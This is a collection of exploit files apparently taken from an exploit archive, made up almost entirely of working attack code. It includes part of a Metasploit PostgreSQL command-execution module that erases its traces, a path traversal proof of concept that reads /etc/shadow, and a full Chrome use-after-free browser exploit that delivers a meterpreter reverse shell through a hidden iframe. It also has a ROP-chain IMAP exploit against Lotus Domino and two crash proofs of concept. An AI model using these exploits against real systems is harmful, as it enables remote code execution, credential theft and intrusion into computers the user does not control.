print_warning "#{peer} - Unable to execute query: #{query}"
if copy_query[:sql_error] =~ /must be superuser to COPY to or from an external program/
print_error 'Insufficient permissions, User must be superuser or in pg_read_server_files group'
return false
end
print_warning "#{peer} - Unable to execute query: #{query}"
return false
when :complete
print_good "#{peer} - #{tablename} copied successfully(valid syntax/command)"
else
print_error "#{peer} - Unknown"
return false
end
if datastore['DUMP_TABLE_OUTPUT']
# Select output from table for debugging
query = "SELECT * FROM #{tablename};"
select_query = postgres_query(query)
case select_query.keys[0]
when :conn_error
print_error "#{peer} - Connection error"
return false
when :sql_error
print_warning "#{peer} - Unable to execute query: #{query}"
return false
when :complete
print_good "#{peer} - #{tablename} contents:\n#{select_query}"
return true
else
print_error "#{peer} - Unknown"
return false
end
end
# Clean up table evidence
query = "DROP TABLE IF EXISTS #{tablename};"
drop_query = postgres_query(query)
case drop_query.keys[0]
when :conn_error
print_error "#{peer} - Connection error"
return false
when :sql_error
print_warning "#{peer} - Unable to execute query: #{query}"
return false
when :complete
print_good "#{peer} - #{tablename} dropped successfully(Cleaned)"
else
print_error "#{peer} - Unknown"
return false
end
end
def do_login(user, pass, database)
begin
password = pass || postgres_password
result = postgres_fingerprint(
db: database,
username: user,
password: password
)
return result[:auth] if result[:auth]
print_error "#{peer} - Login failed"
return :noauth
rescue Rex::ConnectionError
return :noconn
end
end
def exploit
#vuln_version doesn't seem to work
#return unless vuln_version?
return unless login_success?
print_status("Exploiting...")
if execute_payload
print_status("Exploit Succeeded")
else
print_error("Exploit Failed")
end
postgres_logout if @postgres_conn
end
end
# Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass
# Google Dork: N/A
# Date: 4/29/2019
# Exploit Author: MobileNetworkSecurity
# Vendor Homepage: https://www.netnumber.com/products/#data
# Software Link: N/A
# Version: Titan Master 7.9.1
# Tested on: Linux
# CVE : N/A
# Type: WEBAPP
*************************************************************************
A Path Traversal issue was discovered in the Web GUI of NetNumber Titan 7.9.1.
When an authenticated user attempts to download a trace file (through drp) by using a ../../ technique, arbitrary files can be downloaded from the server. Since the webserver running with elevated privileges it is possible to download arbitrary files.
The HTTP request can be executed by any (even low privileged) user, so the authorization mechanism can be bypassed.
*************************************************************************
Proof of Concept (PoC):
http://X.X.X.X/drp?download=true&path=Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$
The vulnerable path parameter is base64 encoded where the equal sign replaced by the dollar sign.
Original payload:
Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$
Replaced dollar signs:
Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw==
Base64 decoded payload:
//SYSTEM/system/trace?download=t&el=../../../../etc/shadow
In the HTTP response you will receive the content of the file.
*************************************************************************
The issue has been fixed in the newer version of the software.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86',
'Description' => %q{
This exploit takes advantage of a use after free vulnerability in Google
Chrome 72.0.3626.119 running on Windows 7 x86.
The FileReader.readAsArrayBuffer function can return multiple references to the
same ArrayBuffer object, which can be freed and overwritten with sprayed objects.
The dangling ArrayBuffer reference can be used to access the sprayed objects,
allowing arbitrary memory access from Javascript. This is used to write and
execute shellcode in a WebAssembly object.
The shellcode is executed within the Chrome sandbox, so you must explicitly
disable the sandbox for the payload to be successful.
},
'License' => MSF_LICENSE,
'Author' => [
'Clement Lecigne', # discovery
'István Kurucsai', # Exodus Intel
'timwr', # metasploit module
],
'References' => [
['CVE', '2019-5786'],
['URL', 'https://github.com/exodusintel/CVE-2019-5786'],
['URL', 'https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/'],
['URL', 'https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/'],
['URL', 'https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html'],
],
'Arch' => [ ARCH_X86 ],
'Platform' => 'windows',
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
'Targets' => [ [ 'Automatic', { } ] ],
'DisclosureDate' => 'Mar 21 2019'))
end
def on_request_uri(cli, request)
print_status("Sending #{request.uri}")
if request.uri =~ %r{/exploit.html$}
html = %Q^
<html>
<head>
<script>
let myWorker = new Worker('worker.js');
let reader = null;
spray = null; // nested arrays used to hold the sprayed heap contents
let onprogress_cnt = 0; // number of times onprogress was called in a round
let try_cnt = 0; // number of rounds we tried
let last = 0, lastlast = 0; // last two AB results from the read
let tarray = 0; // TypedArray constructed from the dangling ArrayBuffer
const string_size = 128 * 1024 * 1024;
let contents = String.prototype.repeat.call('Z', string_size);
let f = new File([contents], "text.txt");
const marker1 = 0x36313233;
const marker2 = 0x37414546;
const outers = 256;
const inners = 1024;
function allocate_spray_holders() {
spray = new Array(outers);
for (let i = 0; i < outers; i++) {
spray[i] = new Array(inners);
}
}
function clear_spray() {
for (let i = 0; i < outers; i++) {
for (let j = 0; j < inners; j++) {
spray[i][j] = null;
}
}
}
function reclaim_mixed() {
// spray the heap to reclaim the freed region
let tmp = {};
for (let i = 0; i < outers; i++) {
for (let j = 0; j + 2 < inners; j+=3) {
spray[i][j] = {a: marker1, b: marker2, c: tmp};
spray[i][j].c = spray[i][j] // self-reference to find our absolute address
spray[i][j+1] = new Array(8);
spray[i][j+2] = new Uint32Array(32);
}
}
}
function find_pattern() {
const start_offset = 0x00afc000 / 4;
for (let i = start_offset; i + 1 < string_size / 4; i++) {
if (i < 50){
console.log(tarray[i].toString(16));
}
// multiply by two because of the way SMIs are stored
if (tarray[i] == marker1 * 2) {
if (tarray[i+1] == marker2 * 2) {
console.log(`found possible candidate objectat idx ${i}`);
return i;
}
}
}
return null;
}
function get_obj_idx(prop_idx) {
// find the index of the Object in the spray array
tarray[prop_idx] = 0x62626262;
for (let i = 0; i < outers; i++) {
for (let j = 0; j < inners; j+=1) {
try {
if (spray[i][j].a == 0x31313131) {
console.log(`found object idx in the spray array: ${i} ${j}`);
return spray[i][j];
}
} catch (e) {}
}
}
}
function ta_read(addr) {
// reads an absolute address through the original freed region
// only works for ta_absolute_addr + string_size (128MiB)
if (addr > ta_absolute_addr && addr < ta_absolute_addr + string_size) {
return tarray[(addr-ta_absolute_addr)/4];
}
return 0;
}
function ta_write(addr, value) {
// wrtie to an absolute address through the original freed region
// only works for ta_absolute_addr + string_size (128MiB)
if (addr % 4 || value > 2**32 - 1 ||
addr < ta_absolute_addr ||
addr > ta_absolute_addr + string_size) {
console.log(`invalid args passed to ta_write(${addr.toString(16)}, ${value}`);
}
tarray[(addr-ta_absolute_addr)/4] = value;
}
function get_corruptable_ui32a() {
// finds a sprayed Uint32Array, the elements pointer of which also falls into the controlled region
for (let i = 0; i < outers; i++) {
for (let j = 0; j + 2 < inners; j+=3) {
let ui32a_addr = addrof(spray[i][j+2]) - 1;
let bs_addr = ta_read(ui32a_addr + 12) - 1;
let elements_addr = ta_read(ui32a_addr + 8) - 1;
// read its elements pointer
// if the elements ptr lies inside the region we have access to
if (bs_addr >= ta_absolute_addr && bs_addr < ta_absolute_addr + string_size &&
elements_addr >= ta_absolute_addr && elements_addr < ta_absolute_addr + string_size) {
console.log(`found corruptable Uint32Array->elements at ${bs_addr.toString(16)}, on Uint32Array idx ${i} ${j}`);
return {
bs_addr: bs_addr,
elements_addr: elements_addr,
ui32: spray[i][j+2],
i: i, j: j
}
}
}
}
}
var reader_obj = null;
var object_prop_taidx = null;
var ta_absolute_addr = null;
var aarw_ui32 = null;
function addrof(leaked_obj) {
reader_obj.a = leaked_obj;
return tarray[object_prop_taidx];
}
function read4(addr) {
// save the old values
let tmp1 = ta_read(aarw_ui32.elements_addr + 12);
let tmp2 = ta_read(aarw_ui32.bs_addr + 16);
// rewrite the backing store ptr
ta_write(aarw_ui32.elements_addr + 12, addr);
ta_write(aarw_ui32.bs_addr + 16, addr);
let val = aarw_ui32.ui32[0];
ta_write(aarw_ui32.elements_addr + 12, tmp1);
ta_write(aarw_ui32.bs_addr + 16, tmp2);
return val;
}
function write4(addr, val) {
// save the old values
let tmp1 = ta_read(aarw_ui32.elements_addr + 12);
let tmp2 = ta_read(aarw_ui32.bs_addr + 16);
// rewrite the backing store ptr
ta_write(aarw_ui32.elements_addr + 12, addr);
ta_write(aarw_ui32.bs_addr + 16, addr);
aarw_ui32.ui32[0] = val;
ta_write(aarw_ui32.elements_addr + 12, tmp1);
ta_write(aarw_ui32.bs_addr + 16, tmp2);
}
function get_rw() {
// free up as much memory as possible
// spray = null;
// contents = null;
force_gc();
// attepmt reclaiming the memory pointed to by dangling pointer
reclaim_mixed();
// access the reclaimed region as a Uint32Array
tarray = new Uint32Array(lastlast);
object_prop_taidx = find_pattern();
if (object_prop_taidx === null) {
console.log('ERROR> failed to find marker');
window.top.postMessage(`ERROR> failed to find marker`, '*');
return;
}
// leak the absolute address of the Object
const obj_absolute_addr = tarray[object_prop_taidx + 2] - 1; // the third property of the sprayed Object is self-referential
ta_absolute_addr = obj_absolute_addr - (object_prop_taidx-3)*4
console.log(`leaked absolute address of our object ${obj_absolute_addr.toString(16)}`);
console.log(`leaked absolute address of ta ${ta_absolute_addr.toString(16)}`);
reader_obj = get_obj_idx(object_prop_taidx);
if (reader_obj == undefined) {
console.log(`ERROR> failed to find object`);
window.top.postMessage(`ERROR> failed to find object`, '*');
return;
}
// now reader_obj is a reference to the Object, object_prop_taidx is the index of its first inline property from the beginning of tarray
console.log(`addrof(reader_obj) == ${addrof(reader_obj)}`);
aarw_ui32 = get_corruptable_ui32a();
// arbitrary read write up after this point
}
var wfunc = null;
let meterpreter = unescape("#{Rex::Text.to_unescape(payload.encoded)}");
function rce() {
function get_wasm_func() {
var importObject = {
imports: { imported_func: arg => console.log(arg) }
};
bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];
wasm_code = new Uint8Array(bc);
wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);
return wasm_mod.exports.exported_func;
}
let wasm_func = get_wasm_func();
wfunc = wasm_func;
// traverse the JSFunction object chain to find the RWX WebAssembly code page
let wasm_func_addr = addrof(wasm_func) - 1;
let sfi = read4(wasm_func_addr + 12) - 1;
let WasmExportedFunctionData = read4(sfi + 4) - 1;
let instance = read4(WasmExportedFunctionData + 8) - 1;
let rwx_addr = read4(instance + 0x74);
// write the shellcode to the RWX page
if (meterpreter.length % 2 != 0)
meterpreter += "\\u9090";
for (let i = 0; i < meterpreter.length; i += 2) {
write4(rwx_addr + i*2, meterpreter.charCodeAt(i) + meterpreter.charCodeAt(i + 1) * 0x10000);
}
// if we got to this point, the exploit was successful
window.top.postMessage('SUCCESS', '*');
console.log('success');
wfunc();
// invoke the shellcode
//window.setTimeout(wfunc, 1000);
}
function force_gc() {
// forces a garbage collection to avoid OOM kills
try {
var failure = new WebAssembly.Memory({initial: 32767});
} catch(e) {
// console.log(e.message);
}
}
function init() {
abs = [];
tarray = 0;
onprogress_cnt = 0;
try_cnt = 0;
last = 0, lastlast = 0;
reader = new FileReader();
reader.onloadend = function(evt) {
try_cnt += 1;
failure = false;
if (onprogress_cnt < 2) {
console.log(`less than 2 onprogress events triggered: ${onprogress_cnt}, try again`);
failure = true;
}
if (lastlast.byteLength != f.size) {
console.log(`lastlast has a different size than expected: ${lastlast.byteLength}`);
failure = true;
}
if (failure === true) {
console.log('retrying in 1 second');
window.setTimeout(exploit, 1);
return;
}
console.log(`onloadend attempt ${try_cnt} after ${onprogress_cnt} onprogress callbacks`);
try {
// trigger the FREE
myWorker.postMessage([last], [last, lastlast]);
} catch(e) {
// an exception with this message indicates that the FREE part of the exploit was successful
if (e.message.includes('ArrayBuffer at index 1 could not be transferred')) {
get_rw();
rce();
return;
} else {
console.log(e.message);
}
}
}
reader.onprogress = function(evt) {
force_gc();
let res = evt.target.result;
// console.log(`onprogress ${onprogress_cnt}`);
onprogress_cnt += 1;
if (res.byteLength != f.size) {
// console.log(`result has a different size than expected: ${res.byteLength}`);
return;
}
lastlast = last;
last = res;
}
if (spray === null) {
// allocate the spray holders if needed
allocate_spray_holders();
}
// clear the spray holder arrays
clear_spray();
// get rid of the reserved ArrayBuffer range, as it may interfere with the exploit
try {
let failure = new ArrayBuffer(1024 * 1024 * 1024);
} catch (e) {
console.log(e.message);
}
force_gc();
}
function exploit() {
init();
reader.readAsArrayBuffer(f);
console.log(`attempt ${try_cnt} started`);
}
</script>
</head>
<body onload="exploit()">
</body>
</html>
^
send_response(cli, html)
elsif request.uri =~ %r{/worker.js$}
send_response(cli, 'onmessage = function (msg) { }')
else
uripath = datastore['URIPATH'] || get_resource
uripath += '/' unless uripath.end_with? '/'
html = %Q^
<html>
<head>
<script>
function iter() {
let iframe = null;
try {
iframe = document.getElementById('myframe');
document.body.removeChild(iframe);
} catch (e) {}
iframe = document.createElement('iframe');
iframe.src = '#{uripath}exploit.html';
iframe.id = 'myframe';
iframe.style = "width:0; height:0; border:0; border:none; visibility=hidden"
document.body.appendChild(iframe);
console.log(document.getElementById('myframe'));
}
function brute() {
window.setTimeout(iter, 1000);
let interval = window.setInterval(iter, 15000);
window.onmessage = function(e) {
if (e.data.includes('SUCCESS')) {
console.log('exploit successful!');
window.clearInterval(interval);
}
console.log(e);
}
}
</script>
</head>
<body onload="brute()"></body>
</html>
^
send_response(cli, html)
end
end
end
#Exploit Title: jetAudio 8.1.7.20702 Basic - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-07
#Vendor Homepage: http://www.jetaudio.com/
#Software Link: http://www.jetaudio.com/download/
#Tested Version: 8.1.7.20702
#Tested on: Windows 7 Service Pack 1 x64 / Windows 10 Single Language x64
#Steps to produce the crash:
#1.- Run python code: jetAudio_8.1.7.20702.py
#2.- Open jetAudio.txt and copy content to clipboard
#2.- Open jetAudio
#3.- Select Menu > Basic Controls > Open URL...
#4.- In "Enter URL" Paste ClipBoard after "http://"
#5.- Click on "Ok"
#6.- Crashed
cod = "\x41" * 5000
f = open('jetAudio.txt', 'w')
f.write(cod)
f.close()
##########################################################
# #
# Here is a working version of the NSA's EMPHASISMINE #
# for IMAP Server Lotus Domino 8.5.3 FP0 #
# DEP/ASLR bypass #
# #
# Replace breakpoints with msfvenom payload #
# (ALPHANUMERIC) #
# I love you Alison Thompson OAM @ThirdWaveORG #
# Author: Charles Truscott @r0ss1n1 #
# #
###########################################################
import base64
import struct
import socket
import time
rop_and_roll = struct.pack('<I', 0x00433212) # POP ECX # RETN [nIMAP.EXE]
rop_and_roll += struct.pack('<I', 0x41414141) # Filler
rop_and_roll += struct.pack('<I', 0x7c37a140) # ptr to &VirtualProtect() [IAT MSVCR71.dll]
rop_and_roll += struct.pack('<I', 0x60609925) # MOV EAX,DWORD PTR DS:[ECX] # RETN [nnotes.dll]
rop_and_roll += struct.pack('<I', 0x60b79a61) # XCHG EAX,ESI # RETN [nnotes.dll]
rop_and_roll += struct.pack('<I', 0x62450fc4) # POP EBP # RETN [NLSCCSTR.DLL]
rop_and_roll += struct.pack('<I', 0x7c345c30) # & push esp # ret [MSVCR71.dll]
rop_and_roll += struct.pack('<I', 0x60165ba9) # POP EBX # RETN [nnotes.dll]
rop_and_roll += struct.pack('<I', 0x00000001) # 0x00000001-> ebx
rop_and_roll += struct.pack('<I', 0x6020962e) # POP EDX # RETN [nnotes.dll]
rop_and_roll += struct.pack('<I', 0x00001000) # 0x00001000-> edx
rop_and_roll += struct.pack('<I', 0x60e81a98) # POP ECX # RETN [nnotes.dll]
rop_and_roll += struct.pack('<I', 0x00000040) # 0x00000040-> ecx
rop_and_roll += struct.pack('<I', 0x606609f9) # POP EDI # RETN [nnotes.dll]
rop_and_roll += struct.pack('<I', 0x62136802) # RETN (ROP NOP) [nxmlproc.dll]
rop_and_roll += struct.pack('<I', 0x0042ba51) # POP EAX # RETN [nIMAP.EXE]
rop_and_roll += struct.pack('<I', 0x90909090) # nop
rop_and_roll += struct.pack('<I', 0x60505637) # PUSHAD # RETN [nnotes.dll]
username = "user"
password = "pass"
login=". LOGIN " + " " + '"' + username + '"' + " " + '"' + password + '"' + "\r\n"
payload = "\x90" * 556 + rop_and_roll + "\x90" * 20 + "\xCC" * (1500 - 556 - len(rop_and_roll) - 20)
encoded = base64.b64encode(payload)
crash = ". EXAMINE " + "&" + encoded + "\x0d\x0a"
print crash
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(('172.16.65.128', 143))
time.sleep(3)
connectionresponse = expl.recv(1024)
print str(connectionresponse)
print "sending LOGIN request"
expl.send(login)
loginresponse = expl.recv(1024)
print str(loginresponse)
print "sending EXAMINE request"
print crash
expl.send(crash)
crashresponse = expl.recv(1024)
print str(crashresponse)
expl.close
#Exploit Title: SpotMSN 2.4.6 - 'Name/Key' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-12
#Vendor Homepage: www.nsauditor.com
#Software Link: http://www.nsauditor.com/downloads/spotmsn_setup.exe
#Tested Version: 2.4.6
#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: SpotMSN_2.4.6.py
#2.- Open SpotMSN.txt and copy content to clipboard
#3.- Open SpotMSN
#4.- Select "Register" > "Enter Registration Code..."
#5.- In "Name/Key" paste Clipboard
#6.- Click "Ok"
#7.- Crarshed
cod = "\x41" * 300
f = open('SpotMSN.txt', 'w')
f.write(cod)
f.close()